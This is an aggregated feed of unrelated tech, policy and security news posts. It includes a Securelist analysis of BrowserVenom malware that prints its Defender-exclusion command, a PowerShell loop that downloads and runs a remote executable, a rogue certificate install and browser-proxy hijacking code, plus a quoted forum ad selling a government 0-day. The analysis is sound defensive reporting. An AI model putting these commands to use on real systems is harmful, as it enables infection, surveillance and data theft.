As common as uranium is in the ground around us, the world’s oceans contain a thousand times more uranium (~4.5 billion tons) than can be mined today. This makes extracting uranium as well as other resources from seawater a very interesting proposition, albeit it one that requires finding a technological solution to not only filter out these highly diluted substances, but also do so in a way that’s economically viable. Now it seems that Chinese researchers have recently come tantalizingly close to achieving this goal.
The anode chemical reaction to extract uranium. (Credit: Wang et al., Nature Sustainability, 2025)
The used electrochemical method is described in the paper (gift link) by [Yanjing Wang] et al., as published in Nature Sustainability. The claimed recovery cost of up to 100% of the uranium in the seawater is approximately $83/kilogram, which would be much cheaper than previous methods and is within striking distance of current uranium spot prices at about $70 – 85.

Of course, the challenge is to scale up this lab-sized prototype into something more industrial-sized. What’s interesting about this low-voltage method is that the conversion of uranium oxide ions to solid uranium oxides occurs at both the anode and cathode unlike with previous electrochemical methods. The copper anode becomes part of the electrochemical process, with UO₂ deposited on the cathode and U₃O₈ on the anode.

Among the reported performance statistics of this prototype are the ability to extract UO₂²⁺ ions from an NaCl solution at concentrations ranging from 1 – 50 ppm. At 20 ppm and in the presence of Cl^– ions (as is typical in seawater), the extraction rate was about 100%, compared to ~9.1% for the adsorption method. All of this required only a cell voltage of 0.6 V with 50 mA current, while being highly uranium-selective. Copper pollution of the water is also prevented, as the dissolved copper from the anode was found on the cathode after testing.

The process was tested on actual seawater (East & South China Sea), with ten hours of operation resulting in a recovery rate of 100% and 85.3% respectively. With potential electrode optimizations suggested by the authors, this extraction method might prove to be a viable way to not only recover uranium from seawater, but also at uranium mining facilities and more.

hackaday.com/2025/06/11/bipola…

Mozilla ha sviluppato una nuova funzionalità di sicurezza che aiuterà a bloccare le estensioni dannose di Firefox che rubano criptovalute agli utenti. Gli sviluppatori segnalano che il nuovo sistema crea profili di rischio per ogni estensione del portafoglio presentata nello store e avvisa automaticamente dei rischi se viene raggiunta una soglia specificata.

Questi avvisi hanno lo scopo di incoraggiare le persone che esaminano i componenti aggiuntivi a esaminarli più attentamente e a rimuovere quelli dannosi dallo store prima che vengano utilizzati per svuotare i portafogli crittografici degli utenti.

“Per proteggere gli utenti di Firefox, il team Add-ons Operations ha sviluppato un sistema di pre-rilevamento progettato per identificare e bloccare le estensioni fraudolente per criptovalute prima che cadano nelle mani di utenti ignari”, afferma il team. “Il primo livello di protezione prevede indicatori automatici che determinano il profilo di rischio delle estensioni per wallet elencate su addons.mozilla.org.

Se un’estensione per wallet raggiunge un certo livello di rischio, i revisori umani vengono avvisati per condurre un’analisi più approfondita. Se l’estensione viene ritenuta dannosa, viene immediatamente bloccata.”

Andreas Wagner, specialista in operazioni di componenti aggiuntivi e responsabile del sistema di revisione dei contenuti e della sicurezza di addons.mozilla.org, sottolinea che negli ultimi anni il suo team ha scoperto e rimosso centinaia di estensioni dannose, tra cui wallet di criptovalute fraudolenti.

“È un continuo gioco del gatto e del topo, con gli sviluppatori che cercano di aggirare i nostri metodi di rilevamento”, spiega Wagner. “Controlla il sito web del tuo portafoglio di criptovalute per vedere se ha un’estensione ufficiale e usa solo quelle linkate sul sito ufficiale.”

L'articolo Mozilla dichiara guerra ai ladri di cripto: nuovo scudo contro estensioni pericolose su Firefox proviene da il blog della sicurezza informatica.

Introduction

DeepSeek-R1 is one of the most popular LLMs right now. Users of all experience levels look for chatbot websites on search engines, and threat actors have started abusing the popularity of LLMs. We previously reported attacks with malware being spread under the guise of DeepSeek to attract victims. The malicious domains spread through X posts and general browsing.

But lately, threat actors have begun using malvertising to exploit the demand for chatbots. For instance, we have recently discovered a new malicious campaign distributing previously unknown malware through a fake DeepSeek-R1 LLM environment installer. The malware is delivered via a phishing site that masquerades as the official DeepSeek homepage. The website was promoted in the search results via Google Ads. The attacks ultimately aim to install BrowserVenom, an implant that reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to manipulate the victim’s network traffic and collect data.

Phishing lure

The infection was launched from a phishing site, located at https[:]//deepseek-platform[.]com. It was spread via malvertising, intentionally placed as the top result when a user searched for “deepseek r1”, thus taking advantage of the model’s popularity. Once the user reaches the site, a check is performed to identify the victim’s operating system. If the user is running Windows, they will be presented with only one active button, “Try now”. We have also seen layouts for other operating systems with slight changes in wording, but all mislead the user into clicking the button.

Malicious website mimicking DeepSeek

Clicking this button will take the user to a CAPTCHA anti-bot screen. The code for this screen is obfuscated JavaScript, which performs a series of checks to make sure that the user is not a bot. We found other scripts on the same malicious domain signaling that this is not the first iteration of such campaigns. After successfully solving the CAPTCHA, the user is redirected to the proxy1.php URL path with a “Download now” button. Clicking that results in downloading the malicious installer named AI_Launcher_1.21.exe from the following URL: https://r1deepseek-ai[.]com/gg/cc/AI_Launcher_1.21.exe.

We examined the source code of both the phishing and distribution websites and discovered comments in Russian related to the websites’ functionality, which suggests that they are developed by Russian-speaking threat actors.

Malicious installer

The malicious installer AI_Launcher_1.21.exe is the launcher for the next-stage malware. Once this binary is executed, it opens a window that mimics a Cloudflare CAPTCHA.

The second fake CAPTCHA

This is another fake CAPTCHA that is loaded from https[:]//casoredkff[.]pro/captcha. After the checkbox is ticked, the URL is appended with /success, and the user is presented with the following screen, offering the options to download and install Ollama and LM Studio.

Two options to install abused LLM frameworks

Clicking either of the “Install” buttons effectively downloads and executes the respective installer, but with a caveat: another function runs concurrently: MLInstaller.Runner.Run(). This function triggers the infectious part of the implant.
private async void lmBtn_Click(object sender, EventArgs e)
{
try
{
MainFrm.<>c__DisplayClass5_0 CS$<>8__locals1 = new MainFrm.<>c__DisplayClass5_0();
this.lmBtn.Text = "Downloading..";
this.lmBtn.Enabled = false;
Action action;
if ((action = MainFrm.<>O.<0>__Run) == null)
{
action = (MainFrm.<>O.<0>__Run = new Action(Runner.Run)); # <--- malware initialization
}
Task.Run(action);
CS$<>8__locals1.ollamaPath = Path.Combine(Path.GetTempPath(), "LM-Studio-0.3.9-6-x64.exe");
[...]
When the MLInstaller.Runner.Run() function is executed in a separate thread on the machine, the infection develops in the following three steps:

1. First, the malicious function tries to exclude the user’s folder from Windows Defender’s protection by decrypting a buffer using the AES encryption algorithm.
   The AES encryption information is hardcoded in the implant:

   Type	AES-256-CBC
   Key	01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20
   IV	01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10

   The decrypted buffer contains a PowerShell command that performs the exclusion once executed by the malicious function.
   powershell.exe -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $USERPROFILE
   It should be noted that this command needs administrator privileges and will fail in case the user lacks them.

2. After that, another PowerShell command runs, downloading an executable from a malicious domain whose name is derived with a simple domain generation algorithm (DGA). The downloaded executable is saved as %USERPROFILE%\Music\1.exe under the user’s profile and then executed.$ap = "/api/getFile?fn=lai.exe";
   $b = $null;
   foreach($i in 0..1000000) {
   $s = if ($i - gt 0) {
   $i
   } else {
   ""
   };
   $d = "https://app-updater$s.app$ap";
   $b = (New - Object Net.WebClient).DownloadData($d);
   if ($b) {
   break
   }

   };
   if ([Runtime.InteropServices.RuntimeEnvironment]::GetSystemVersion() - match"^v2") {
   [IO.File]::WriteAllBytes("$env:USERPROFILE\Music\1.exe", $b);
   Start - Process "$env:USERPROFILE\Music\1.exe" - NoNewWindow
   } else {
   ([Reflection.Assembly]::Load($b)).EntryPoint.Invoke($null, $null)
   }
   At the moment of our research, there was only one domain in existence: app-updater1[.]app. No binary can be downloaded from this domain as of now but we suspect that this might be another malicious implant, such as a backdoor for further access. So far, we have managed to obtain several malicious domain names associated with this threat; they are highlighted in the IoCs section.

3. Then the MLInstaller.Runner.Run() function locates a hardcoded stage two payload in the class and variable ConfigFiles.load of the malicious installer’s buffer. This executable is decrypted with the same AES algorithm as before in order to be loaded into memory and run.

Loaded implant: BrowserVenom

We dubbed the next-stage implant BrowserVenom because it reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to sniff sensitive data and monitor the victim’s browsing activity while decrypting their traffic.

First, BrowserVenom checks if the current user has administrator rights – exiting if not – and installs a hardcoded certificate created by the threat actor:
[...]
X509Certificate2 x509Certificate = new X509Certificate2(Resources.cert);
if (RightsChecker.IsProcessRunningAsAdministrator())
{
StoreLocation storeLocation = StoreLocation.LocalMachine;
X509Store x509Store = new X509Store(StoreName.Root, storeLocation);
x509Store.Open(OpenFlags.ReadWrite);
x509Store.Add(x509Certificate);
[...]
Then the malware adds a hardcoded proxy server address to all currently installed and running browsers. For Chromium-based instances (i.e., Chrome or Microsoft Edge), it adds the proxy-server argument and modifies all existent LNK files, whereas for Gecko-based browsers, such as Mozilla or Tor Browser, the implant modifies the current user’s profile preferences:
[...]
new ChromeModifier(new string
[] {
"chrome.exe", "msedge.exe", "opera.exe", "brave.exe", "vivaldi.exe", "browser.exe", "torch.exe", "dragon.exe", "iron.exe", "epic.exe",
"blisk.exe", "colibri.exe", "centbrowser.exe", "maxthon.exe", "coccoc.exe", "slimjet.exe", "urbrowser.exe", "kiwi.exe"
}, string.Concat(new string
[] {
"--proxy-server=\"",
ProfileSettings.Host,
":",
ProfileSettings.Port,
"\""
})).ProcessShortcuts();
GeckoModifier.Modify();
[...]
The settings currently utilized by the malware are as follows:
public static readonly string Host = "141.105.130[.]106";
public static readonly string Port = "37121";
public static readonly string ID = "LauncherLM";
public static string HWID = ChromeModifier.RandomString(5);
The variables Host and Port are the ones used as the proxy settings, and the ID and HWID are appended to the browser’s User-Agent, possibly as a way to keep track of the victim’s network traffic.

Conclusion

As we have been reporting, DeepSeek has been the perfect lure for attackers to attract new victims. Threat actors’ use of new malicious tooling, such as BrowserVenom, complicates the detection of their activities. This, combined with the use of Google Ads to reach more victims and look more plausible, makes such campaigns even more effective.

At the time of our research, we detected multiple infections in Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. The nature of the bait and the geographic distribution of attacks indicate that campaigns like this continue to pose a global threat to unsuspecting users.

To protect against these attacks, users are advised to confirm that the results of their searches are official websites, along with their URLs and certificates, to make sure that the site is the right place to download the legitimate software from. Taking these precautions can help avoid this type of infection.

Kaspersky products detect this threat as HEUR:Trojan.Win32.Generic and Trojan.Win32.SelfDel.iwcv.

Indicators of Compromise

Hashes

d435a9a303a27c98d4e7afa157ab47de AI_Launcher_1.21.exe
dc08e0a005d64cc9e5b2fdd201f97fd6

Domains and IPs

securelist.com/browservenom-mi…

Texas lawmakers trying to muzzle campus protests have just passed one of the most ridiculous anti-speech laws in the country, as Freedom of the Press Foundation senior adviser Caitlin Vogus explains in the Houston Chronicle.

A new bill, SB 2972, would require public universities in Texas to adopt policies prohibiting “engaging in expressive activities on campus between the hours of 10 p.m. and 8 a.m.” Expressive activity includes “any speech or expressive conduct” protected by the First Amendment or Texas Constitution.

As Vogus writes, Governor Greg Abbott “should veto this unconstitutional and absurd bill before Texas has to waste taxpayers’ money defending it. And Texans should find some time — preferably at night — to exercise their First Amendment right to question the competence of the legislators who wrote or supported this bill.”

Read the whole article here.

freedom.press/issues/texas-is-…

Since it came into force almost seven years ago, the European Union (EU)'s General Data Protection Regulation (GDPR) has set the global standard for data protection. It empowers people to control their personal data while holding businesses accountable for how they collect, process, and store that data. One would imagine that all of the above would cement the GDPR, but this crucial law is being threatened by a push for profit at any cost.

The post Why the EU’s GDPR ‘simplification’ reforms could unravel hard-won protections appeared first on European Digital Rights (EDRi).

EDRi, ECNL and Lighthouse Reports are excited to launch a series of online sessions to facilitate collaboration and information sharing between journalists and civil society actors.

The post Fighting spyware – Journalism, litigation and policy after the Pegasus Scandal appeared first on European Digital Rights (EDRi).

Join the Digital Intimacy Coalition for a timely and crucial conversation on the future of adult content regulation. This webinar brings together three experts from the worlds of law, tech policy, and porn production to unpack the complex consequences of current and proposed age verification mandates

The post Age Verification and the Future of Adult Content Regulation webinar appeared first on European Digital Rights (EDRi).

Sometimes, when making a 3D printed object, plastic just isn’t enough. Probably the most common addition to our prints is the ubiquitous brass threaded inset, which has proven its worth time and again over the years in providing a secure screw attachment point with less hassle than a captive nut. Of course to insert these bits of machined brass, you need to press them in, and unless you’ve got a very good hand with a soldering iron it’s usually a good idea to use a press of some sort. [TimNummy] shows us that, ironically enough, making such a press is perfectly doable using only printed parts. Well, save for the soldering iron, of course.

He calls it the Superserter. Not only is it 100% printed plastic, but the entire design fits on a single 256 mm by 256 mm bed. In his case it was done on the Bambulab X1C, but it’s a common enough print bed size and can be printed without any supports. It’s even sized to fit the popular Gridfinity standard for a neat and tidy desk and handy bin placement for the inserts.

[TimNummy] clearly spent some time thinking about design for 3D printed manufacturing in order to create an assembly that does not need linear rails, sliders, or bearings as other press projects often do. The ironic thing is that if that same amount of effort went into other designs, it might eliminate the need for threaded inserts entirely.

If you haven’t delved into the world of threaded inserts, we put up a how-to-guide a few years ago. If you’re wondering if you can get away with just printing threads, the answer is “maybe”– we highlighted a video comparing printed threads with different inserts a while back to get you started thinking about the design limitations there.

youtube.com/embed/xoMrW3jdhm8?…

hackaday.com/2025/06/11/thread…

Gli analisti di Cisco Talos hanno segnalato che le infrastrutture critiche in Ucraina sono state attaccate da un nuovo malware che distrugge i dati chiamato PathWiper. I ricercatori scrivono che il payload è stato distribuito tramite uno strumento di amministrazione degli endpoint legittimo, il che significa che gli aggressori avevano accesso amministrativo al sistema di destinazione in anticipo.

Gli esperti paragonano PathWiper a un altro malware distruttivo, HermeticWiper (noto anche come FoxBlade, KillDisk e NEARMISS), precedentemente distribuito in Ucraina dal gruppo Sandworm. Data la somiglianza di queste minacce, si presume che PathWiper possa essere una continuazione di HermeticWiper e che il malware venga utilizzato in attacchi contro cluster di minacce identici o sovrapposti.

PathWiper viene distribuito sui sistemi di destinazione tramite un file batch di Windows che esegue un VBScript dannoso (uacinstall.vbs), che a sua volta scarica ed esegue il payload principale (sha256sum.exe). Si noti che, per eludere il rilevamento durante l’esecuzione, il malware imita il comportamento e utilizza nomi associati a uno strumento di amministrazione legittimo.

Invece di elencare semplicemente le unità fisiche come fa HermeticWiper, PathWiper identifica programmaticamente tutte le unità connesse (locali, di rete, non montate). Il malware sfrutta quindi la capacità dell’API di Windows di smontare i volumi per prepararli alla distruzione e crea un thread separato per ciascun volume per sovrascrivere le strutture NTFS critiche, tra cui:

• MBR (Master Boot Record) è il primo settore di un disco fisico, contenente il boot loader e la tabella delle partizioni;
• $MFT (Master File Table) è il file di sistema NTFS principale che contiene una directory di tutti i file e le cartelle, inclusa la loro posizione sul disco e i metadati;
• $LogFile: registro utilizzato per registrare le operazioni NTFS, tenere traccia delle modifiche ai file e verificare l’integrità e il ripristino dei dati;
• $Boot è un file contenente informazioni sul settore di avvio e sul layout del file system.

PathWiper sovrascrive tutti i file NTFS critici con byte casuali, rendendo i sistemi di destinazione completamente inutilizzabili. Poiché gli attacchi studiati non comportavano estorsione o richieste finanziarie, gli esperti concludono che il loro unico obiettivo fosse distruggere dati e compromettere i sistemi.

Gli esperti concludono che PathWiper è l’ennesima aggiunta alla lista dei programmi che hanno preso di mira l’Ucraina negli ultimi anni, tra cui WhisperGate , WhisperKill , HermeticWiper , IsaacWiper , DoubleZero , CaddyWiper e AcidRain .

L'articolo Arriva PathWiper! Il nuovo malware che devasta le infrastrutture critiche in Ucraina proviene da il blog della sicurezza informatica.

Every Thursday of the week, Bastian’s Night is broadcast from 21:30 CET (new time).

Bastian’s Night is a live talk show in German with lots of music, a weekly round-up of news from around the world, and a glimpse into the host’s crazy week in the pirate movement aka Cabinet of Curiosities.

If you want to read more about @BastianBB: –> This way

piratesonair.net/bastians-nigh…

Our hacker [Valve Child] wrote in to let us know about his Back to the Future lunchbox cyberdeck.

Great Scott! This is so awesome. We’re not sure what we should say, or where we should begin. A lot of you wouldn’t have been there, on July 3rd, 1985, nearly forty years ago. But we were there. Oh yes, we were there. On that day the movie Back to the Future was released, along with the hit song from its soundtrack: Huey Lewis & The News – The Power Of Love.

For the last forty years Back to the Future has been inspiring nerds and hackers everywhere with its themes of time-travel and technology. If you know what to look for you will find references to the movie throughout nerd culture. The OUTATIME number plate behind Dave Jones in the EEVblog videos? Back to the Future. The Flux Capacitor for sale at the Australian electronics store Jaycar? Back to the Future. The EEVblog 121GW Multimeter? Back to the Future. But it’s not just those kooky Australians, it’s all over the place including Rick and Morty, The Big Bang Theory, Ready Player One, Family Guy, The Simpsons, Futurama, Marvel’s Avengers: Endgame, LEGO Dimensions, and more.

As [Valve Child] explains he has built this cyberdeck for use on his work bench from a lunchbox gifted to him by his children last Christmas. His cyberdeck is based on the Raspberry Pi 5 and includes a cool looking and completely unnecessary water cooling system, a flux capacitor which houses the power supply, voltage and current meters, an OLED display for temperature and other telemetry, a bunch of lighting for that futuristic aesthetic, and a Bluetooth boombox for 80’s flair. Click through to watch the video demonstration of this delightfully detailed cyberdeck and if you want check out the extra photos too.

We ran a search for “Back to the Future” in the Hackaday archives and found 73 articles that mentioned the movie! Over the years we’ve riffed on hoverboards, calculator watches, the DeLorean, and the slick Mr. Fusion unit; and long may we continue.

hackaday.com/2025/06/10/back-t…

2 Luglio 2025 | Siziano (PV) | Evento riservato a imprenditori, IT manager e professionisti della sicurezza
Nel panorama sempre più complesso della cybersecurity, capire davvero come avviene un attacco informatico e come difendersi non è mai stato così urgente.

Per questo nasce “Hack The System”, l’evento esclusivo organizzato da Omnia, in collaborazione con Red Hot Cyber e WithSecure, in programma il 2 luglio 2025 all’interno di un moderno datacenter Tier IV a Siziano (PV).

L’obiettivo: vedere per capire, proteggersi per tempo

Durante la mattinata, uno dei migliori ethical hacker italiani del team Hackerhood eseguirà una simulazione reale di attacco ransomware su un’infrastruttura composta da:

• Domain Controller Windows
• Server di posta Zimbra
• SQL Server
• Postazioni client

Lo scenario parte da un classico attacco di phishing, evolve con un’escalation di privilegi fino alla cifratura dei dati.

A seguire, verrà eseguita la stessa simulazione con l’EDR attivo, per dimostrare in diretta come una protezione moderna sia in grado di bloccare la propagazione del ransomware e mitigare l’attacco.

A chi è rivolto l’evento?

L’iniziativa è riservata e a numero chiuso (solo 40 posti disponibili): è pensata per imprenditori, general manager, IT manager, CISO e MSP che vogliono toccare con mano come si muove un attacco reale e quali soluzioni oggi rappresentano una difesa efficace.

Agenda della giornata

10:00 – 10:30 | Welcome Coffee & Networking
10:30 – 10:45 | Presentazione Omnia
10:45 – 11:00 | Presentazione WithSecure
11:00 – 13:00 | Live Hacking a cura di Hackerhood (RHC)
13:00 – 14:00 | Light Lunch & confronto con gli esperti
14:00 – 14:20 | Suite Elements: protezione completa proattiva
14:20 – 14:35 | Presentazione del Datacenter STACKMI01
14:35 – 15:15 | Tour esclusivo del Datacenter

Perché non puoi mancare?

• Vedrai un attacco ransomware simulato in tempo reale, senza filtri
• Capirai come proteggere davvero la tua azienda da minacce evolute
• Scoprirai soluzioni concrete come l’EDR di WithSecure
• Potrai confrontarti con esperti, pentester, bug hunter ed MSP
• Vivrai un’esperienza immersiva e professionale all’interno di un vero datacenter produttivo

Registrazione obbligatoria – posti limitati
Prenota ora il tuo posto accedendo alla landing ufficiale dell’evento:
👉 bit.ly/4jHoKsS

L'articolo “Hack The System”: l’evento esclusivo sulla Cybersecurity dove assisterai a un attacco ransomware in diretta proviene da il blog della sicurezza informatica.

Nel mondo sotterraneo della cybercriminalità, esistono figure meno note ma fondamentali per orchestrare attacchi di vasta scala: gli Initial Access Broker (IAB). A differenza dei gruppi ransomware o dei malware-as-a-service, gli IAB non colpiscono direttamente, ma forniscono l’accesso iniziale alle infrastrutture compromesse.

Sono i trafficanti di porte d’ingresso per tutto ciò che può venire dopo: furti di dati, ransomware, spionaggio.

Uno degli esempi più inquietanti è emerso di recente da un forum underground, dove l’utente DedSec ha messo in vendita una 0-day nei sistemi critici del governo tunisino, dichiarando apertamente: “Offro una 0day critico in un sistema governativo tunisino che garantisce accesso a quasi tutti i portali E-Government… DGI, CNSS, CNAM, poste, banche, settori militari.”

Il prezzo? Due milioni di dollari, con tanto di supporto incluso: un piano d’attacco già pronto per sfruttare la vulnerabilità.
Sto offrendo un 0day critico e di alto valore in un sistema governativo tunisino che contiene tutto ciò che si desidera, tranne la modifica di alcune cose come la modifica delle proprietà (ma è possibile se si scala). Questo include l'accesso a quasi tutti i portali di E-Government e, a seconda del portale e dei privilegi dell'utente, è possibile avviare richieste ufficiali, modificare dati, estrarre dati, accedere a conti bancari e altro ancora. Inoltre, come regalo da parte nostra, vi daremo un piano pronto per sfruttarlo.

Alcuni esempi di portali E-Gov:

l'Autorità fiscale tunisina (DGI), la Cassa nazionale di previdenza sociale (CNSS), la Cassa nazionale di assicurazione malattia (CNAM), le Poste tunisine, i settori dell'istruzione, le banche, alcuni settori militari e altro ancora.

Avvertenze: Non posso dire tutto ciò che si può ottenere (dati), ma tutto ciò che un utente o un cittadino tunisino in questi luoghi può fare e ancora una volta dipende dal luogo e dal privilegio che l'utente ha.

Non mostrerò alcuna prova né dirò alcuna informazione sul sistema finché non pagherete, allora la prova sarà la vuln. una volta che ne avrete verificato la validità, potremo continuare. Come ho detto, accetto gli intermediari, quindi non preoccupatevi dei vostri soldi.

Prezzo: $2M

E se lo vuoi solo per te stesso possiamo parlarne in pm.

IAB: chi sono e perché sono pericolosi

Gli Initial Access Broker sono intermediari criminali specializzati nel violare sistemi informatici per poi rivendere l’accesso ad altri attori malevoli. Questi ultimi possono essere:

• gruppi ransomware,
• agenti di minacce nazionali (APT),
• criminali interessati a frodi bancarie,
• truffatori specializzati in furti d’identità,
• attori che cercano accesso persistente a infrastrutture critiche.

Un IAB non ha bisogno di sfruttare direttamente la falla. Il suo compito è quello di scovare la vulnerabilità, penetrarla silenziosamente, e poi metterla sul mercato. In molti casi, sfruttano vulnerabilità 0-day, cioè sconosciute anche ai fornitori di software. Nel caso del governo tunisino, DedSec afferma che con questa 0-day sia possibile:

• estrarre dati da enti fiscali, previdenziali, educativi e sanitari,
• accedere a conti bancari,
• modificare dati personali,
• presentare richieste ufficiali a nome di altri cittadini,
• e persino accedere a settori militari sensibili.

La pericolosità non risiede solo nel danno economico o nella violazione della privacy, ma nel fatto che questo tipo di accesso potrebbe essere usato da attori geopolitici per destabilizzare intere nazioni.

L’importanza della Cyber Threat Intelligence (CTI)

È proprio in scenari come questo che la Cyber Threat Intelligence diventa essenziale. Le CTI permettono a governi e aziende di:

• intercettare post nei forum underground come quello di DedSec,
• monitorare la vendita di exploit o accessi,
• riconoscere pattern ricorrenti tra IAB,
• valutare il rischio reale prima che gli exploit vengano utilizzati,
• allertare i CERT nazionali e mitigare la vulnerabilità prima che sia troppo tardi.

Una CTI efficace consente non solo di reagire, ma di prevenire, evitando che un accesso iniziale diventi un attacco su larga scala. La figura degli Initial Access Broker è spesso invisibile al grande pubblico, ma rappresenta la miccia che accende il fuoco. In un contesto dove una vulnerabilità venduta per 2 milioni di dollari può compromettere l’intera infrastruttura digitale di uno Stato, la minaccia non può più essere sottovalutata.

La difesa non può più essere reattiva.

Serve intelligence, monitoraggio costante e collaborazione internazionale. Prima che l’accesso diventi un attacco.

L'articolo Gli Initial Access Broker minacciano la Sicurezza nazionale. Accesso al governo tunisino in vendita proviene da il blog della sicurezza informatica.

Gli analisti di Symantec hanno identificato gravi vulnerabilità in diverse estensioni di Google Chrome, che minacciano la privacy e la sicurezza degli utenti. I problemi riguardano la trasmissione di dati sensibili tramite un protocollo HTTP non protetto e la presenza di segreti hard-coded nel codice delle estensioni.

Secondo il ricercatore Yuanjing Guo del team Symantec, diverse estensioni ampiamente utilizzate trasmettono involontariamente dati sensibili tramite una connessione HTTP non protetta. Questi dati includono domini dei siti visitati, identificativi dei dispositivi, informazioni sul sistema operativo, analisi dell’utilizzo e persino informazioni sull’eventuale rimozione dell’estensione. Tutto ciò viene trasmesso in chiaro, senza crittografia. Poiché il traffico non è protetto, è vulnerabile agli attacchi Adversary-in-the-Middle (AitM).

Gli aggressori sulla stessa rete, ad esempio su una rete Wi-Fi pubblica, possono non solo intercettare le informazioni trasmesse, ma anche modificarle, il che può portare a conseguenze più gravi. L’elenco delle estensioni non sicure include:

• SEMRush Rank e PI Rank : accedi all’indirizzo tramite HTTP rank.trellian[.]com;
• Browsec VPN : quando si rimuove l’estensione, invia una richiesta tramite HTTP a browsec-uninstall.s3-website.eu-central-1.amazonaws[.]com;
• MSN Nuova scheda e MSN Homepage, Bing Search e News : trasmettono identificatori univoci del dispositivo a g.ceipmsn[.]com;
• DualSafe Password Manager : trasferisce le statistiche di utilizzo, la versione dell’estensione e la lingua del browser in stats.itopupdate[.]com.

Sebbene non siano state rilevate perdite dirette di password, il fatto che il gestore delle password invii dati di telemetria tramite una connessione non protetta mina la fiducia nella sua affidabilità. Symantec ha anche identificato un altro gruppo di estensioni che codificano direttamente chiavi API, token e segreti. Questi dati possono essere utilizzati dagli aggressori per creare richieste dannose e condurre attacchi.

Tra questi:

• AVG Online Security , Speed ​​Dial [FVD] , SellerSprite : contengono un segreto hard-coded di Google Analytics 4 (GA4), con il cui aiuto è possibile distorcere le metriche;
• Equatio – contiene la chiave Microsoft Azure utilizzata per il riconoscimento vocale;
• Awesome Screen Recorder e Scrolling Screenshot Tool : la chiave sviluppatore AWS per caricare screenshot sullo storage S3;
• Microsoft Editor : utilizza una chiave di telemetria StatsApiKeyper raccogliere analisi;
• Antidote Connector : utilizza una libreria di terze parti, InboxSDK, con chiavi API codificate. La stessa libreria è utilizzata in oltre 90 altre estensioni, i cui nomi non sono divulgati;
• Watch2Gether , Trust Wallet , TravelArrow : contengono rispettivamente le chiavi pubbliche per le API Tenor, Ramp Network e ip-api.

Gli aggressori che ottengono l’accesso a queste chiavi possono falsificare la telemetria, simulare transazioni di criptovaluta, pubblicare contenuti proibiti e aumentare i costi degli sviluppatori per le chiamate API. Gli esperti sottolineano: da GA4 ad Azure, da AWS a Ramp, poche righe di codice non protetto possono compromettere un intero servizio. La soluzione è non archiviare dati sensibili lato client e utilizzare solo canali di comunicazione sicuri.

Si consiglia agli utenti di rimuovere le estensioni non sicure finché gli sviluppatori non elimineranno le chiamate tramite un protocollo non protetto. Il traffico trasparente non è una minaccia astratta: può essere facilmente intercettato e utilizzato per phishing, sorveglianza e attacchi mirati. Anche un’elevata popolarità e un marchio riconoscibile non garantiscono il rispetto dei principi di sicurezza di base. Le estensioni devono essere verificate in base ai protocolli utilizzati e alla natura delle informazioni trasmesse: solo questo può garantire una reale protezione dei dati.

L'articolo Estensioni Chrome sotto accusa: gravi falle mettono a rischio milioni di utenti proviene da il blog della sicurezza informatica.

It is a good bet that if most scientists and engineers were honest, they would most like to leave something behind that future generations would remember. While Marie Curie met that standard — she was the first woman to win the Nobel prize because of her work with radioactivity, and a unit of radioactivity (yes, we know — not the SI unit) is a Curie. However, Curie also left something else behind inadvertently: radioactive residue. As the BBC explains, science detectives are retracing her steps and facing some difficult decisions about what to do with contaminated historical artifacts.

Marie was born in Poland and worked in Paris. Much of the lab she shared with her husband is contaminated with radioactive material transferred by the Curies’ handling of things like radium with their bare hands.

Some of the traces have been known for years, including some on the lab notebooks the two scientists shared. However, they are still finding contamination, including at her family home, presumably brought in from the lab.

There is some debate about whether all the contamination is actually from Marie. Her daughter, Irène, also used the office. The entire story starts when Marie realized that radioactive pitchblende contained uranium and thorium, but was more radioactive than those two elements when they were extracted. The plan was to extract all the uranium and thorium from a sample, leaving this mystery element.

It was a solid plan, but working in a store room and, later, a shed with no ventilation and handling materials bare-handed wasn’t a great idea. They did isolate two elements: polonium (named after Marie’s birth country) and radium. Research eventually proved fatal as Marie succumbed to leukemia, probably due to other work she did with X-rays. She and her husband are now in Paris’ Pantheon, in lead-lined coffins, just in case.

If you want a quick video tour of the museum, [Sem Wonders] has a video you can see, below. If you didn’t know about the Curie’s scientist daughter, we can help you with that. Meanwhile, you shouldn’t be drinking radium.

youtube.com/embed/Js2mFBrCoRU?…

hackaday.com/2025/06/10/what-m…

Our Spring 2025 conference is this Sunday, June 15th in the Lavender Room at Arts at the Armory, 191 Highland Ave., Somerville. The conference starts at 10am and ends by 4pm.

Schedule

Our conference schedule and session descriptions.

Conference Sessions

Policy and Platform Discussion

We will start by presenting a summary of the party’s current policy positions. From there we will discuss what positions/policy areas we should add. The goal is not to engage in lengthy policy debates, but to identify any gaps in the current platform, prioritize those issues we need to review and adopt positions on. Each individual policy is important, but our platform should be greater than the sum of its parts, a coherent and convincing argument for the party.

Monopoly Free Capitalism

Wendy Welsh will suggest ideas to increase business competition.

Lunch and protecting your privacy hands on

While eating, people knowledgeable in privacy will give hands on tutorials for tech like signal or tor.

How to navigate your local government

Steve Revilak, a Pirate town meeting member in Arlington and our First Officer, discusses how town government works and how you can bring change to yours.

Review of Party Initiatives

First we will outline each of the party’s efforts, assessing their isolated efficacy, as well as their role in accomplishing the party’s overall goals. We will discuss areas we should improve and what changes we need to make. Finally, we will make plans for the next year, including how to gauge the success of our projects.

Road to Town Meeting

Kolby Blehm will discuss his community education program, currently titled “Road to Town
Meeting”, which aims to educate his town on the year long cycle of town government culminating in voting together at town meeting and resetting with elections each year.

Candidate Tutorial

Captain James will give a quick intro to running for office.

Election planning for 2026

We will discuss the races we currently know we are running in for the upcoming year, as well those we might compete in. We will discuss candidate recruitment, voter outreach efforts, and overall strategy.

Registration

The conference is free, but we request that participants register in advance. We encourage attendees to mask to protect everyone’s health. We will have masks and COVID tests for attendees as well as air purifiers. We plan to live stream it for people who cannot attend in person.

The Site

Arts at the Armory is wheelchair accessible, has free parking in the back, is on the Route 88 and 90 bus lines and walking distance from the Gilman and Magoun Squares MBTA Green Line stations. The Lavender Room is in the basement and is accessible by stair and elevator.

Spread the Word!

Share our Facebook event or post up our conference flyer.

